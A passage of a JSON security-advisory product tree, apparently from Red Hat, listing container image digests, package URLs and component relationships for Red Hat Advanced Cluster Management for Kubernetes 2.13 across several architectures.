"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-subscription-rhel9@sha256%3Aac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775176904"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"product_id": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multiclusterhub-rhel9@sha256%3Aeb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915533"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-must-gather-rhel9@sha256%3A508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775077876"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"product_id": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"product_identification_helper": {
"purl": "pkg:oci/node-exporter-rhel9@sha256%3A64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915524"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9@sha256%3A8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915522"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9-operator@sha256%3A498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775281134"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"product_id": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-rhel9@sha256%3A433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915610"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"product_id": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-alertmanager-rhel9@sha256%3A5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915598"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-config-reloader-rhel9@sha256%3A384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915573"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-rhel9@sha256%3A1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915621"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"product_id": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rbac-query-proxy-rhel9@sha256%3A661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915649"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"product_id": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"product_identification_helper": {
"purl": "pkg:oci/search-collector-rhel9@sha256%3A8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775566178"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-indexer-rhel9@sha256%3Aed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915641"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-api-rhel9@sha256%3Afc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915647"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-rhel9@sha256%3A0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915649"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-siteconfig-rhel9@sha256%3A4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775657510"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"product_id": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/submariner-addon-rhel9@sha256%3Ad6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915751"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x",
"product_id": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/thanos-rhel9@sha256%3Ae63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915751"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"product_id": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/thanos-receive-controller-rhel9@sha256%3A327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-volsync-addon-controller-rhel9@sha256%3Afaeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774984227"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
